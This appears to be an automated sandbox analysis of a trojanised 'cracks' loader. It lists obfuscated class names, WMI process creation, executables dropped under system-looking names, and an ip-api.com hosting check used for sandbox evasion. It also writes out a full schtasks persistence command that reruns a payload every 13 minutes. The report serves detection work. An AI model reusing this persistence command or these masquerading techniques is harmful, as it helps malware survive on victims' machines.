            Source: 0.3.NewLoaderCracks_1.32.exe.699af90.0.raw.unpack, uWJtAR9o9PjlxWL4lFK.csHigh entropy of concatenated method names: '_981', 'YZ8', 'd52', 'G9C', 'dEOkqMyO2PNCOH7Ho5L', 'OjnainyR8Fjwc2dQ8Wo', 'YU4tYKy30h63Qlvtdhv', 'hN0CNRyX4IG1hbo8eOn', 'PQVIb2ytRLWTYdS36gq', 'xZaelDyk1pPH41YXo1k'
            Source: 0.3.NewLoaderCracks_1.32.exe.699af90.0.raw.unpack, VInybP7k0ixBkseEAD1.csHigh entropy of concatenated method names: 'Tfj8NKmpOh', 'bSx8k7QxNU', 'oyt8d14TZb', 'kce8OSFEOx', 'S0I8a1Ro3k', 'CIT8q6x0v4', 'N3Q8SeFqo9', 'UvA85rNyMc', 'llC881TTGG', 'NGm81vY57R'
            Source: 0.3.NewLoaderCracks_1.32.exe.699af90.0.raw.unpack, Jmiyo69tB8oRYqcLHMT.csHigh entropy of concatenated method names: '_7v4', 'YZ8', '_888', 'G9C', 'TpOS1pAb8ng9tqBEV49', 'TitlTMA4mjbVMucuZRS', 'AdFQaHAnZcdyqa7s0uV', 'PgJPTtAQCBrLKibKFOF', 'XMLH74AP9glh1SZ2mcK', 'SlZ9D6ALo0ii6xUKoew'
            Source: 0.3.NewLoaderCracks_1.32.exe.699af90.0.raw.unpack, CoVvi9lYLyxTnXKOuL2.csHigh entropy of concatenated method names: 'Tns7kpWlxG', 'lewTyxdIr3OkTTobvQQ', 'zIUEKudDT9dCVKMfOLq', 'dJoCNUdVLyS8JYrHOoc', 'nGt0OkdMNGE7pYjnp04', 'XgtAsodOAIGX1PFS6t3', 'NeN7FjSBUH', 'mAL7PaG99L', 'NO57ULQC3Y', 'jt77mG3Qjb'
            Source: 0.3.NewLoaderCracks_1.32.exe.699af90.0.raw.unpack, SRPF5B3uChleNW0KYcq.csHigh entropy of concatenated method names: 'InMZ4KTU5ZoafkUaiAK', 'trVXL4TWs8trW261SpJ', 'SCxCS8TgZjO3E2Y5Bii', 'yqf7PLTNL22pB87Op9L', 'kDjOxAxSiJ', 'WM4', '_499', 'wY0OD48yL3', 'lEqOBAmhcV', 'LkROEBI8ff'
            Source: 0.3.NewLoaderCracks_1.32.exe.699af90.0.raw.unpack, qerjpp94FVH9SYQEuJe.csHigh entropy of concatenated method names: '_625', 'YZ8', '_9pX', 'G9C', 'FdZoIBA8OoLwYY3W5wE', 'pUrkuqAw2Nt5rc6fFjf', 'rOJBvDA51ffNxxQMoL0', 'jXCny1AKuHSatEDppjr', 'aHUdrFA14kjfP4uEQnL', 'MMSS2JAvnxhZKH7MRT6'
            Source: 0.3.NewLoaderCracks_1.32.exe.699af90.0.raw.unpack, RWBK019CF7nUcsTZE0b.csHigh entropy of concatenated method names: 'gt5l93NGes', 'KALllYadky', 'nLTlRmROYB', 'ypMkn2lMBfeVM6kSdvU', 'yjbd3IlOtB7JkanJqJs', 'z4KRunlVrRX7QFmEOw1', 'uxLiWwlIWbAcMtlu8cC', 'mpW34ylRUVR1Oo0ZuQ8', 'qmCroJl3LHM8X7ivlQZ', 'aNjthVlX8PAqnFR2ZsC'

            Persistence and Installation Behavior

            barindex
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comcontainer\SurrogateRef.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\comcontainer\SurrogateRef.exeFile created: C:\Recovery\csrss.exeJump to dropped file
            Source: C:\comcontainer\SurrogateRef.exeFile created: C:\Program Files (x86)\MSECache\OfficeKMS\win8\SwpTnCnrsAAKjgTAQ.exeJump to dropped file
            Source: C:\comcontainer\SurrogateRef.exeFile created: C:\comcontainer\SwpTnCnrsAAKjgTAQ.exeJump to dropped file
            Source: C:\comcontainer\SurrogateRef.exeFile created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\SwpTnCnrsAAKjgTAQ.exeJump to dropped file
            Source: C:\comcontainer\SurrogateRef.exeFile created: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeJump to dropped file
            Source: C:\comcontainer\SurrogateRef.exeFile created: C:\Recovery\SwpTnCnrsAAKjgTAQ.exeJump to dropped file
            Source: C:\comcontainer\SurrogateRef.exeFile created: C:\Windows\CbsTemp\RuntimeBroker.exeJump to dropped file
            Source: C:\comcontainer\SurrogateRef.exeFile created: C:\Recovery\WmiPrvSE.exeJump to dropped file
            Source: C:\comcontainer\SurrogateRef.exeFile created: C:\Recovery\csrss.exeJump to dropped file
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeFile created: C:\comcontainer\SurrogateRef.exeJump to dropped file
            Source: C:\comcontainer\SurrogateRef.exeFile created: C:\Program Files (x86)\jDownloader\config\RuntimeBroker.exeJump to dropped file
            Source: C:\comcontainer\SurrogateRef.exeFile created: C:\Users\Public\AccountPictures\SwpTnCnrsAAKjgTAQ.exeJump to dropped file
            Source: C:\comcontainer\SurrogateRef.exeFile created: C:\Program Files (x86)\WindowsPowerShell\SwpTnCnrsAAKjgTAQ.exeJump to dropped file
            Source: C:\comcontainer\SurrogateRef.exeFile created: C:\Program Files (x86)\Reference Assemblies\SwpTnCnrsAAKjgTAQ.exeJump to dropped file
            Source: C:\comcontainer\SurrogateRef.exeFile created: C:\comcontainer\cmd.exeJump to dropped file
            Source: C:\comcontainer\SurrogateRef.exeFile created: C:\Program Files\WindowsPowerShell\SwpTnCnrsAAKjgTAQ.exeJump to dropped file
            Source: C:\comcontainer\SurrogateRef.exeFile created: C:\Program Files (x86)\Windows Mail\SurrogateRef.exeJump to dropped file
            Source: C:\comcontainer\SurrogateRef.exeFile created: C:\Program Files\Windows NT\Idle.exeJump to dropped file
            Source: C:\comcontainer\SurrogateRef.exeFile created: C:\Windows\CbsTemp\RuntimeBroker.exeJump to dropped file

            Boot Survival

            barindex
            Source: C:\comcontainer\SurrogateRef.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SwpTnCnrsAAKjgTAQS" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\jdownloader\config\SwpTnCnrsAAKjgTAQ.exe'" /f
            Source: C:\Users\user\Desktop\NewLoaderCracks_1.32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\comcontainer\SurrogateRef.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\jDownloader\config\SwpTnCnrsAAKjgTAQ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
